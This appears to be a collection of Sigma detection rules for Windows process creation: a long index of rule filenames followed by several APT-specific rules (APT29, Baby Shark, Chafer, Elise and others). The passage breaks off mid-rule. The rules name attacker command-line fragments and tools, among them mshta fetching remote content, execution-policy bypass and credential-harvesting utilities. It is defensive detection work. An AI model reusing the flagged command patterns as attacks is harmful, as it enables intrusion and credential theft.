proc_creation_win_malware_trickbot_recon_activity.yml
proc_creation_win_malware_trickbot_wermgr.yml
proc_creation_win_malware_wannacry.yml
proc_creation_win_manage_bde_lolbas.yml
proc_creation_win_mavinject_proc_inj.yml
proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml
proc_creation_win_mimikatz_command_line.yml
proc_creation_win_mmc20_lateral_movement.yml
proc_creation_win_mmc_spawn_shell.yml
proc_creation_win_modif_of_services_for_via_commandline.yml
proc_creation_win_monitoring_for_persistence_via_bits.yml
proc_creation_win_mouse_lock.yml
proc_creation_win_msdeploy.yml
proc_creation_win_msedge_minimized_download.yml
proc_creation_win_mshta_javascript.yml
proc_creation_win_mshta_spawn_shell.yml
proc_creation_win_msiexec_execute_dll.yml
proc_creation_win_msiexec_install_quiet.yml
proc_creation_win_mstsc.yml
proc_creation_win_multiple_suspicious_cli.yml
proc_creation_win_net_enum.yml
proc_creation_win_net_use_admin_share.yml
proc_creation_win_net_user_add.yml
proc_creation_win_netcat_execution.yml
proc_creation_win_netsh_allow_port_rdp.yml
proc_creation_win_netsh_fw_add.yml
proc_creation_win_netsh_fw_add_susp_image.yml
proc_creation_win_netsh_fw_enable_group_rule.yml
proc_creation_win_netsh_packet_capture.yml
proc_creation_win_netsh_port_fwd.yml
proc_creation_win_netsh_port_fwd_3389.yml
proc_creation_win_netsh_wifi_credential_harvesting.yml
proc_creation_win_network_sniffing.yml
proc_creation_win_new_service_creation.yml
proc_creation_win_nltest_recon.yml
proc_creation_win_non_interactive_powershell.yml
proc_creation_win_non_priv_reg_or_ps.yml
proc_creation_win_office_applications_spawning_wmi_commandline.yml
proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml
proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml
proc_creation_win_office_shell.yml
proc_creation_win_office_spawn_exe_from_users_directory.yml
proc_creation_win_office_spawning_wmi_commandline.yml
proc_creation_win_outlook_shell.yml
proc_creation_win_pingback_backdoor.yml
proc_creation_win_plugx_susp_exe_locations.yml
proc_creation_win_possible_applocker_bypass.yml
proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml
proc_creation_win_powershell_amsi_bypass.yml
proc_creation_win_powershell_audio_capture.yml
proc_creation_win_powershell_b64_shellcode.yml
proc_creation_win_powershell_bitsjob.yml
proc_creation_win_powershell_cmdline_reversed_strings.yml
proc_creation_win_powershell_cmdline_special_characters.yml
proc_creation_win_powershell_cmdline_specific_comb_methods.yml
proc_creation_win_powershell_defender_disable_feature.yml
proc_creation_win_powershell_defender_exclusion.yml
proc_creation_win_powershell_disable_windef_av.yml
proc_creation_win_powershell_dll_execution.yml
proc_creation_win_powershell_downgrade_attack.yml
proc_creation_win_powershell_download.yml
proc_creation_win_powershell_download_patterns.yml
proc_creation_win_powershell_frombase64string.yml
proc_creation_win_powershell_reverse_shell_connection.yml
proc_creation_win_powershell_suspicious_parameter_variation.yml
proc_creation_win_powershell_xor_commandline.yml
proc_creation_win_powersploit_empire_schtasks.yml
proc_creation_win_proc_dump_createdump.yml
proc_creation_win_proc_dump_rdrleakdiag.yml
proc_creation_win_proc_wrong_parent.yml
proc_creation_win_procdump.yml
proc_creation_win_procdump_evasion.yml
proc_creation_win_process_dump_rdrleakdiag.yml
proc_creation_win_process_dump_rundll32_comsvcs.yml
proc_creation_win_protocolhandler_suspicious_file.yml
proc_creation_win_proxy_execution_wuauclt.yml
proc_creation_win_psexesvc_start.yml
proc_creation_win_public_folder_parent.yml
proc_creation_win_purplesharp_indicators.yml
proc_creation_win_pypykatz.yml
proc_creation_win_query_registry.yml
proc_creation_win_ransom_blackbyte.yml
proc_creation_win_rasautou_dll_execution.yml
proc_creation_win_rdp_hijack_shadowing.yml
proc_creation_win_redirect_to_stream.yml
proc_creation_win_redmimicry_winnti_proc.yml
proc_creation_win_reg_add_run_key.yml
proc_creation_win_reg_defender_exclusion.yml
proc_creation_win_reg_dump_sam.yml
proc_creation_win_reg_service_imagepath_change.yml
proc_creation_win_regedit_export_critical_keys.yml
proc_creation_win_regedit_export_keys.yml
proc_creation_win_regedit_import_keys.yml
proc_creation_win_regedit_import_keys_ads.yml
proc_creation_win_regini.yml
proc_creation_win_regini_ads.yml
proc_creation_win_remote_powershell_session_process.yml
proc_creation_win_remote_time_discovery.yml
proc_creation_win_remove_windows_defender_definition_files.yml
proc_creation_win_renamed_binary.yml
proc_creation_win_renamed_binary_highly_relevant.yml
proc_creation_win_renamed_jusched.yml
proc_creation_win_renamed_megasync.yml
proc_creation_win_renamed_paexec.yml
proc_creation_win_renamed_powershell.yml
proc_creation_win_renamed_procdump.yml
proc_creation_win_renamed_psexec.yml
proc_creation_win_renamed_whoami.yml
proc_creation_win_root_certificate_installed.yml
proc_creation_win_run_executable_invalid_extension.yml
proc_creation_win_run_from_zip.yml
proc_creation_win_run_powershell_script_from_ads.yml
proc_creation_win_run_powershell_script_from_input_stream.yml
proc_creation_win_run_virtualbox.yml
proc_creation_win_rundll32_not_from_c_drive.yml
proc_creation_win_rundll32_registered_com_objects.yml
proc_creation_win_rundll32_without_parameters.yml
proc_creation_win_screenconnect.yml
proc_creation_win_screenconnect_anomaly.yml
proc_creation_win_script_event_consumer_spawn.yml
proc_creation_win_sdbinst_shim_persistence.yml
proc_creation_win_sdclt_child_process.yml
proc_creation_win_sdelete.yml
proc_creation_win_service_execution.yml
proc_creation_win_service_stop.yml
proc_creation_win_set_policies_to_unsecure_level.yml
proc_creation_win_shadow_copies_access_symlink.yml
proc_creation_win_shadow_copies_creation.yml
proc_creation_win_shadow_copies_deletion.yml
proc_creation_win_shell_spawn_by_java.yml
proc_creation_win_shell_spawn_mshta.yml
proc_creation_win_shell_spawn_susp_program.yml
proc_creation_win_silenttrinity_stage_use.yml
proc_creation_win_software_discovery.yml
proc_creation_win_soundrec_audio_capture.yml
proc_creation_win_spn_enum.yml
proc_creation_win_sqlcmd_veeam_dump.yml
proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml
proc_creation_win_stickykey_like_backdoor.yml
proc_creation_win_stordiag_execution.yml
proc_creation_win_sus_auditpol_usage.yml
proc_creation_win_susp_7z.yml
proc_creation_win_susp_acccheckconsole.yml
proc_creation_win_susp_add_user_remote_desktop.yml
proc_creation_win_susp_adfind.yml
proc_creation_win_susp_adfind_enumerate.yml
proc_creation_win_susp_adidnsdump.yml
proc_creation_win_susp_advancedrun.yml
proc_creation_win_susp_advancedrun_priv_user.yml
proc_creation_win_susp_atbroker.yml
proc_creation_win_susp_athremotefxvgpudisablementcommand.yml
proc_creation_win_susp_bcdedit.yml
proc_creation_win_susp_bginfo.yml
proc_creation_win_susp_bitstransfer.yml
proc_creation_win_susp_calc.yml
proc_creation_win_susp_cdb.yml
proc_creation_win_susp_certreq_download.yml
proc_creation_win_susp_certutil_command.yml
proc_creation_win_susp_certutil_encode.yml
proc_creation_win_susp_char_in_cmd.yml
proccreation_win_susp_child_process_as_system.yml
proc_creation_win_susp_cipher.yml
proc_creation_win_susp_cli_escape.yml
proc_creation_win_susp_cmd_http_appdata.yml
proc_creation_win_susp_cmd_shadowcopy_access.yml
proc_creation_win_susp_cmdl32_lolbas.yml
proc_creation_win_susp_codepage_switch.yml
proc_creation_win_susp_commands_recon_activity.yml
proc_creation_win_susp_compression_params.yml
proc_creation_win_susp_comsvcs_procdump.yml
proc_creation_win_susp_conhost.yml
proc_creation_win_susp_control_cve_2021_40444.yml
proc_creation_win_susp_control_dll_load.yml
proc_creation_win_susp_copy_lateral_movement.yml
proc_creation_win_susp_copy_system32.yml
proc_creation_win_susp_covenant.yml
proc_creation_win_susp_crackmapexec_execution.yml
proc_creation_win_susp_crackmapexec_flags.yml
proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml
proc_creation_win_susp_csc.yml
proc_creation_win_susp_csc_folder.yml
proc_creation_win_susp_cscript_vbs.yml
proc_creation_win_susp_csi.yml
proc_creation_win_susp_curl_download.yml
proc_creation_win_susp_curl_fileupload.yml
proc_creation_win_susp_curl_start_combo.yml
proc_creation_win_susp_curl_useragent.yml
proc_creation_win_susp_dctask64_proc_inject.yml
proc_creation_win_susp_del.yml
proc_creation_win_susp_desktopimgdownldr.yml
proc_creation_win_susp_devinit_lolbin.yml
proc_creation_win_susp_devtoolslauncher.yml
proc_creation_win_susp_dir.yml
proc_creation_win_susp_direct_asep_reg_keys_modification.yml
proc_creation_win_susp_disable_eventlog.yml
proc_creation_win_susp_disable_ie_features.yml
proc_creation_win_susp_disable_raccine.yml
proc_creation_win_susp_diskshadow.yml
proc_creation_win_susp_ditsnap.yml
proc_creation_win_susp_dnx.yml
proc_creation_win_susp_double_extension.yml
proc_creation_win_susp_download_office_domain.yml
proc_creation_win_susp_dtrace_kernel_dump.yml
proc_creation_win_susp_dxcap.yml
proc_creation_win_susp_emotet_rundll32_execution.yml
proc_creation_win_susp_esentutl_params.yml
proc_creation_win_susp_eventlog_clear.yml
proc_creation_win_susp_execution_path.yml
proc_creation_win_susp_execution_path_webserver.yml
proc_creation_win_susp_explorer.yml
proc_creation_win_susp_explorer_break_proctree.yml
proc_creation_win_susp_explorer_nouaccheck.yml
proc_creation_win_susp_file_characteristics.yml
proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml
proc_creation_win_susp_findstr.yml
proc_creation_win_susp_findstr_385201.yml
proc_creation_win_susp_findstr_lnk.yml
proc_creation_win_susp_finger_usage.yml
proc_creation_win_susp_firewall_disable.yml
proc_creation_win_susp_format.yml
proc_creation_win_susp_fsutil_usage.yml
proc_creation_win_susp_ftp.yml
proc_creation_win_susp_gup.yml
proc_creation_win_susp_hostname.yml
proc_creation_win_susp_image_missing.yml
proc_creation_win_susp_instalutil.yml
proc_creation_win_susp_iss_module_install.yml
proc_creation_win_susp_lsass_clone.yml
proc_creation_win_susp_machineguid.yml
proc_creation_win_susp_mounted_share_deletion.yml
proc_creation_win_susp_mpcmdrun_download.yml
proc_creation_win_susp_mpiexec_lolbin.yml
proc_creation_win_susp_mshta_execution.yml
proc_creation_win_susp_mshta_pattern.yml
proc_creation_win_susp_msiexec_cwd.yml
proc_creation_win_susp_msiexec_web_install.yml
proc_creation_win_susp_msoffice.yml
proc_creation_win_susp_net_execution.yml
proc_creation_win_susp_net_use_password_plaintext.yml
proc_creation_win_susp_netsh_command.yml
proc_creation_win_susp_netsh_dll_persistence.yml
proc_creation_win_susp_network_command.yml
proc_creation_win_susp_network_listing_connections.yml
proc_creation_win_susp_ngrok_pua.yml
proc_creation_win_susp_nmap.yml
proc_creation_win_susp_non_exe_image.yml
proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml
proc_creation_win_susp_ntdsutil.yml
proc_creation_win_susp_odbcconf.yml
proc_creation_win_susp_openwith.yml
proc_creation_win_susp_outlook.yml
proc_creation_win_susp_outlook_temp.yml
proc_creation_win_susp_pcwutl.yml
proc_creation_win_susp_pester.yml
proc_creation_win_susp_ping_hex_ip.yml
proc_creation_win_susp_plink_remote_forward.yml
proc_creation_win_susp_powershell_empire_launch.yml
proc_creation_win_susp_powershell_empire_uac_bypass.yml
proc_creation_win_susp_powershell_enc_cmd.yml
proc_creation_win_susp_powershell_encode.yml
proc_creation_win_susp_powershell_encoded_param.yml
proc_creation_win_susp_powershell_getprocess_lsass.yml
proc_creation_win_susp_powershell_hidden_b64_cmd.yml
proc_creation_win_susp_powershell_parent_combo.yml
proc_creation_win_susp_powershell_parent_process.yml
proc_creation_win_susp_powershell_sam_access.yml
proc_creation_win_susp_pressynkey_lolbin.yml
proc_creation_win_susp_print.yml
proc_creation_win_susp_procdump.yml
proc_creation_win_susp_procdump_lsass.yml
proc_creation_win_susp_progname.yml
proc_creation_win_susp_ps_appdata.yml
proc_creation_win_susp_ps_downloadfile.yml
proc_creation_win_susp_psexec_eula.yml
proc_creation_win_susp_psexex_paexec_escalate_system.yml
proc_creation_win_susp_psexex_paexec_flags.yml
proc_creation_win_susp_psloglist.yml
proc_creation_win_susp_psr_capture_screenshots.yml
proc_creation_win_susp_radmin.yml
proc_creation_win_susp_rar_flags.yml
proc_creation_win_susp_rasdial_activity.yml
proc_creation_win_susp_razorinstaller_explorer.yml
proc_creation_win_susp_rclone_execution.yml
proc_creation_win_susp_recon.yml
proc_creation_win_susp_recon_activity.yml
proc_creation_win_susp_recon_net_activity.yml
proc_creation_win_susp_redir_local_admin_share.yml
proc_creation_win_susp_reg_bitlocker.yml
proc_creation_win_susp_reg_disable_sec_services.yml
proc_creation_win_susp_reg_open_command.yml
proc_creation_win_susp_regedit_trustedinstaller.yml
proc_creation_win_susp_register_cimprovider.yml
proc_creation_win_susp_registration_via_cscript.yml
proc_creation_win_susp_regsvr32_anomalies.yml
proc_creation_win_susp_regsvr32_flags_anomaly.yml
proc_creation_win_susp_regsvr32_http_pattern.yml
proc_creation_win_susp_regsvr32_image.yml
proc_creation_win_susp_regsvr32_no_dll.yml
proc_creation_win_susp_renamed_dctask64.yml
proc_creation_win_susp_renamed_debugview.yml
proc_creation_win_susp_renamed_paexec.yml
proc_creation_win_susp_rpcping.yml
proc_creation_win_susp_run_folder.yml
proc_creation_win_susp_run_locations.yml
proc_creation_win_susp_rundll32_activity.yml
proc_creation_win_susp_rundll32_by_ordinal.yml
proc_creation_win_susp_rundll32_inline_vbs.yml
proc_creation_win_susp_rundll32_js_runhtmlapplication.yml
proc_creation_win_susp_rundll32_no_params.yml
proc_creation_win_susp_rundll32_script_run.yml
proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml
proc_creation_win_susp_rundll32_sys.yml
proc_creation_win_susp_runonce_execution.yml
proc_creation_win_susp_runscripthelper.yml
proc_creation_win_susp_sc_query.yml
proc_creation_win_susp_schtask_creation.yml
proc_creation_win_susp_schtask_creation_temp_folder.yml
proc_creation_win_susp_schtasks_disable.yml
proc_creation_win_susp_schtasks_env_folder.yml
proc_creation_win_susp_schtasks_parent.yml
proc_creation_win_susp_schtasks_pattern.yml
proc_creation_win_susp_schtasks_user_temp.yml
proc_creation_win_susp_screenconnect_access.yml
proc_creation_win_susp_screensaver_reg.yml
proc_creation_win_susp_script_exec_from_env_folder.yml
proc_creation_win_susp_script_exec_from_temp.yml
proc_creation_win_susp_script_execution.yml
proc_creation_win_susp_service_dacl_modification.yml
proc_creation_win_susp_service_dir.yml
proc_creation_win_susp_service_modification.yml
proc_creation_win_susp_service_path_modification.yml
proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml
proc_creation_win_susp_servu_process_pattern.yml
proc_creation_win_susp_sharpview.yml
proc_creation_win_susp_shell_spawn_by_java.yml
proc_creation_win_susp_shell_spawn_by_java_keytool.yml
proc_creation_win_susp_shell_spawn_from_mssql.yml
proc_creation_win_susp_shell_spawn_from_winrm.yml
proc_creation_win_susp_shimcache_flush.yml
proc_creation_win_susp_shutdown.yml
proc_creation_win_susp_splwow64.yml
proc_creation_win_susp_spoolsv_child_processes.yml
proc_creation_win_susp_sqldumper_activity.yml
proc_creation_win_susp_squirrel_lolbin.yml
proc_creation_win_susp_svchost.yml
proc_creation_win_susp_svchost_no_cli.yml
proc_creation_win_susp_sysprep_appdata.yml
proc_creation_win_susp_system_user_anomaly.yml
proc_creation_win_susp_systeminfo.yml
proc_creation_win_susp_sysvol_access.yml
proc_creation_win_susp_takeown.yml
proc_creation_win_susp_target_location_shell32.yml
proc_creation_win_susp_taskkill.yml
proc_creation_win_susp_tasklist_command.yml
proc_creation_win_susp_taskmgr_localsystem.yml
proc_creation_win_susp_taskmgr_parent.yml
proc_creation_win_susp_tracker_execution.yml
proc_creation_win_susp_trolleyexpress_procdump.yml
proc_creation_win_susp_tscon_localsystem.yml
proc_creation_win_susp_tscon_rdp_redirect.yml
proc_creation_win_susp_uac_bypass_trustedpath.yml
proc_creation_win_susp_use_of_csharp_console.yml
proc_creation_win_susp_use_of_sqlps_bin.yml
proc_creation_win_susp_use_of_sqltoolsps_bin.yml
proc_creation_win_susp_use_of_te_bin.yml
proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
proc_creation_win_susp_userinit_child.yml
proc_creation_win_susp_vboxdrvinst.yml
proc_creation_win_susp_vbscript_unc2452.yml
proc_creation_win_susp_volsnap_disable.yml
proc_creation_win_susp_web_request_cmd.yml
proc_creation_win_susp_webdav_client_execution.yml
proc_creation_win_susp_where_execution.yml
proc_creation_win_susp_whoami.yml
proc_creation_win_susp_whoami_anomaly.yml
proc_creation_win_susp_whoami_as_param.yml
proc_creation_win_susp_winrar_dmp.yml
proc_creation_win_susp_winrar_execution.yml
proc_creation_win_susp_winrm_awl_bypass.yml
proc_creation_win_susp_winrm_execution.yml
proc_creation_win_susp_winzip.yml
proc_creation_win_susp_wmi_execution.yml
proc_creation_win_susp_wmic_eventconsumer_create.yml
proc_creation_win_susp_wmic_proc_create_rundll32.yml
proc_creation_win_susp_wmic_security_product_uninstall.yml
proc_creation_win_susp_workfolders.yml
proc_creation_win_susp_wsl_lolbin.yml
proc_creation_win_susp_wuauclt.yml
proc_creation_win_susp_wuauclt_cmdline.yml
proc_creation_win_susp_zip_compress.yml
proc_creation_win_susp_zipexec.yml
proc_creation_win_suspicious_ad_reco.yml
proc_creation_win_syncappvpublishingserver_execute_powershell.yml
proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml
proc_creation_win_sysinternals_eula_accepted.yml
proc_creation_win_sysmon_driver_unload.yml
proc_creation_win_sysmon_uac_bypass_eventvwr.yml
proc_creation_win_system_exe_anomaly.yml
proc_creation_win_tap_installer_execution.yml
proc_creation_win_task_folder_evasion.yml
proc_creation_win_termserv_proc_spawn.yml
proc_creation_win_tool_nircmd.yml
proc_creation_win_tool_nircmd_as_system.yml
proc_creation_win_tool_nsudo_as_system.yml
proc_creation_win_tool_psexec.yml
proc_creation_win_tool_runx_as_system.yml
proc_creation_win_tools_relay_attacks.yml
proc_creation_win_tor_browser.yml
proc_creation_win_trust_discovery.yml
proc_creation_win_tttracer_mod_load.yml
proc_creation_win_uac_bypass_changepk_slui.yml
proc_creation_win_uac_bypass_cleanmgr.yml
proc_creation_win_uac_bypass_computerdefaults.yml
proc_creation_win_uac_bypass_consent_comctl32.yml
proc_creation_win_uac_bypass_dismhost.yml
proc_creation_win_uac_bypass_ieinstal.yml
proc_creation_win_uac_bypass_msconfig_gui.yml
proc_creation_win_uac_bypass_ntfs_reparse_point.yml
proc_creation_win_uac_bypass_pkgmgr_dism.yml
proc_creation_win_uac_bypass_winsat.yml
proc_creation_win_uac_bypass_wmp.yml
proc_creation_win_uac_bypass_wsreset.yml
proc_creation_win_uac_cmstp.yml
proc_creation_win_uac_fodhelper.yml
proc_creation_win_uac_wsreset.yml
proc_creation_win_uninstall_crowdstrike_falcon.yml
proc_creation_win_uninstall_sysmon.yml
proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml
proc_creation_win_using_sc_to_hide_sevices.yml
proc_creation_win_using_settingsynchost_as_lolbin.yml
proc_creation_win_verclsid_runs_com.yml
proc_creation_win_visual_basic_compiler.yml
proc_creation_win_vmtoolsd_susp_child_process.yml
proc_creation_win_vul_java_remote_debugging.yml
proc_creation_win_webshell_detection.yml
proc_creation_win_webshell_recon_detection.yml
proc_creation_win_webshell_spawn.yml
proc_creation_win_whoami_as_priv_user.yml
proc_creation_win_whoami_as_system.yml
proc_creation_win_whoami_priv.yml
proc_creation_win_win10_sched_task_0day.yml
proc_creation_win_win_exchange_transportagent.yml
proc_creation_win_win_lolbas_dump64.yml
proc_creation_win_winword_dll_load.yml
proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
proc_creation_win_wmi_persistence_script_event_consumer.yml
proc_creation_win_wmi_spwns_powershell.yml
proc_creation_win_wmic_reconnaissance.yml
proc_creation_win_wmic_remote_service.yml
proc_creation_win_wmic_remove_application.yml
proc_creation_win_wmiprvse_spawning_process.yml
proc_creation_win_workflow_compiler.yml
proc_creation_win_write_protect_for_storage_disabled.yml
proc_creation_win_wsreset_uac_bypass.yml
proc_creation_win_xordump.yml
proc_creation_win_xsl_script_processing.yml

APT

proc_creation_win_apt_actinium_persistence.yml
  1. title: Scheduled Task WScript VBScript
  2. id: e1118a8f-82f5-44b3-bb6b-8a284e5df602
  3. status: experimental
  4. description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
  5. author: Andreas Hunkeler (@Karneades)
  6. references:
  7.   - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations
  8. date: 2022/02/07
  9. logsource:
  10.   category: process_creation
  11.   product: windows
  12. detection:
  13.   selection:
  14.     CommandLine|contains|all:
  15.       - 'schtasks'
  16.       - 'create'
  17.       - 'wscript'
  18.       - 'e:vbscript'
  19.   condition: selection
  20. fields:
  21.   - CommandLine
  22.   - ParentCommandLine
  23. falsepositives:
  24.   - Unlikely
  25. level: high

proc_creation_win_apt_apt29_thinktanks.yml
  2. title: APT29
  3. id: 033fe7d6-66d1-4240-ac6b-28908009c71f
  4. status: test
  5. description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
  6. author: Florian Roth
  7. references:
  8.   - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
  9.   - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
  10. date: 2018/12/04
  11. modified: 2021/11/27
  12. logsource:
  13.   category: process_creation
  14.   product: windows
  15. detection:
  16.   selection:
  17.     CommandLine|contains|all:
  18.       - '-noni'
  19.       - '-ep'
  20.       - 'bypass'
  21.       - '$'
  22.   condition: selection
  23. falsepositives:
  24.   - unknown
  25. level: critical
  26. tags:
  27.   - attack.execution
  28.   - attack.g0016
  29.   - attack.t1059.001

proc_creation_win_apt_babyshark.yml
  1. title: Baby Shark Activity
  2. id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35
  3. status: test
  4. description: Detects activity that could be related to Baby Shark malware
  5. author: Florian Roth
  6. references:
  7.   - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
  8. date: 2019/02/24
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     CommandLine:
  16.       - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
  17.       - powershell.exe mshta.exe http*
  18.       - cmd.exe /c taskkill /im cmd.exe
  19.   condition: selection
  20. falsepositives:
  21.   - unknown
  22. level: high
  23. tags:
  24.   - attack.execution
  25.   - attack.t1059.003
  26.   - attack.t1059.001
  27.   - attack.discovery
  28.   - attack.t1012
  29.   - attack.defense_evasion
  30.   - attack.t1218.005

proc_creation_win_apt_bear_activity_gtr19.yml
  1. title: Judgement Panda Credential Access Activity
  2. id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
  3. status: test
  4. description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
  5. author: Florian Roth
  6. references:
  7.   - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
  8. date: 2019/02/21
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection1:
  15.     Image|endswith: '\xcopy.exe'
  16.     CommandLine|contains|all:
  17.       - '/S'
  18.       - '/E'
  19.       - '/C'
  20.       - '/Q'
  21.       - '/H'
  22.       - '\\'
  23.   selection2:
  24.     Image|endswith: '\adexplorer.exe'
  25.     CommandLine|contains|all:
  26.       - '-snapshot'
  27.       - '""'
  28.       - 'c:\users\'
  29.   condition: selection1 or selection2
  30. falsepositives:
  31.   - unknown
  32. level: critical
  33. tags:
  34.   - attack.credential_access
  35.   - attack.t1552.001
  36.   - attack.t1003.003

proc_creation_win_apt_bluemashroom.yml
  1. title: BlueMashroom DLL Load
  2. id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0
  3. status: test
  4. description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report
  5. author: Florian Roth, Tim Shelton
  6. references:
  7.   - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software
  8. date: 2019/10/02
  9. modified: 2022/03/02
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     - CommandLine|contains|all:
  16.       - '\regsvr32'
  17.       - '\AppData\Local\'
  18.     - CommandLine|contains|all:
  19.       - '\AppData\Local\'
  20.       - ',DllEntry'
  21.   filter_1:
  22.     - CommandLine|contains: 'AppData\Local\Microsoft\TeamsMeetingAddin\'
  23.     - CommandLine|endswith:
  24.       - '\x86\Microsoft.Teams.AddinLoader.dll'
  25.       - '\x86\Microsoft.Teams.AddinLoader.dll"'
  26.       - '\x64\Microsoft.Teams.AddinLoader.dll'
  27.       - '\x64\Microsoft.Teams.AddinLoader.dll"'
  28.   condition: selection and not 1 of filter*
  29. falsepositives:
  30.   - Unlikely
  31. level: critical
  32. tags:
  33.   - attack.defense_evasion
  34.   - attack.t1218.010

proc_creation_win_apt_chafer_mar18.yml
  1. title: Chafer Activity
  2. id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
  3. related:
  4.     - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
  5.       type: derived
  6. description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
  7. status: experimental
  8. references:
  9.     - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
  10. tags:
  11.     - attack.persistence
  12.     - attack.g0049
  13.     - attack.t1053.005
  14.     - attack.s0111
  15.     - attack.t1543.003
  16.     - attack.defense_evasion
  17.     - attack.t1112
  18.     - attack.command_and_control
  19.     - attack.t1071.004
  20. date: 2018/03/23
  21. modified: 2021/09/19
  22. author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
  23. logsource:
  24.     category: process_creation
  25.     product: windows
  26. detection:
  27.     selection_process0:
  28.         CommandLine|contains: '\Service.exe'
  29.         CommandLine|endswith: 
  30.             - 'i'
  31.             - 'u'
  32.     selection_process1:
  33.         - CommandLine|endswith: '\microsoft\Taskbar\autoit3.exe'
  34.         - CommandLine|startswith: 'C:\wsc.exe'
  35.     selection_process2:
  36.         Image|contains: '\Windows\Temp\DB\'
  37.         Image|endswith: '.exe'
  38.     selection_process3:
  39.         CommandLine|contains|all: 
  40.             - '\nslookup.exe'
  41.             - '-q=TXT'
  42.         ParentImage|contains: '\Autoit'
  43.     condition: 1 of selection*
  44. falsepositives:
  45.     - Unknown
  46. level: critical

proc_creation_win_apt_cloudhopper.yml
  1. title: WMIExec VBS Script
  2. id: 966e4016-627f-44f7-8341-f394905c361f
  3. status: test
  4. description: Detects suspicious file execution by wscript and cscript
  5. author: Florian Roth
  6. references:
  7.   - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
  8. date: 2017/04/07
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     Image|endswith: '\cscript.exe'
  16.     CommandLine|contains|all:
  17.       - '.vbs'
  18.       - '/shell'
  19.   condition: selection
  20. fields:
  21.   - CommandLine
  22.   - ParentCommandLine
  23. falsepositives:
  24.   - Unlikely
  25. level: critical
  26. tags:
  27.   - attack.execution
  28.   - attack.g0045
  29.   - attack.t1059.005

proc_creation_win_apt_dragonfly.yml
  2. title: CrackMapExecWin
  3. id: 04d9079e-3905-4b70-ad37-6bdf11304965
  4. status: test
  5. description: Detects CrackMapExecWin Activity as Described by NCSC
  6. author: Markus Neis
  7. references:
  8.   - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control
  9.   - https://attack.mitre.org/software/S0488/
  10. date: 2018/04/08
  11. modified: 2021/11/27
  12. logsource:
  13.   category: process_creation
  14.   product: windows
  15. detection:
  16.   selection:
  17.     Image|endswith:
  18.       - '\crackmapexec.exe'
  19.   condition: selection
  20. falsepositives:
  21.   - None
  22. level: critical
  23. tags:
  24.   - attack.g0035
  25.   - attack.credential_access
  26.   - attack.discovery
  27.   - attack.t1110
  28.   - attack.t1087

proc_creation_win_apt_elise.yml
  1. title: Elise Backdoor
  2. id: e507feb7-5f73-4ef6-a970-91bb6f6d744f
  3. status: test
  4. description: Detects Elise backdoor acitivty as used by APT32
  5. author: Florian Roth
  6. references:
  7.   - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting
  8. date: 2018/01/31
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection1:
  15.     Image: 'C:\Windows\SysWOW64\cmd.exe'
  16.     CommandLine|contains: '\Windows\Caches\NavShExt.dll '
  17.   selection2:
  18.     CommandLine|endswith: '\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll,Setting'
  19.   condition: 1 of selection*
  20. falsepositives:
  21.   - Unknown
  22. level: critical
  23. tags:
  24.   - attack.g0030
  25.   - attack.g0050
  26.   - attack.s0081
  27.   - attack.execution
  28.   - attack.t1059.003

proc_creation_win_apt_emissarypanda_sep19.yml
  1. title: Emissary Panda Malware SLLauncher
  2. id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014
  3. status: test
  4. description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
  5. author: Florian Roth
  6. references:
  7.   - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
  8.   - https://twitter.com/cyb3rops/status/1168863899531132929
  9. date: 2018/09/03
  10. modified: 2021/11/27
  11. logsource:
  12.   category: process_creation
  13.   product: windows
  14. detection:
  15.   selection:
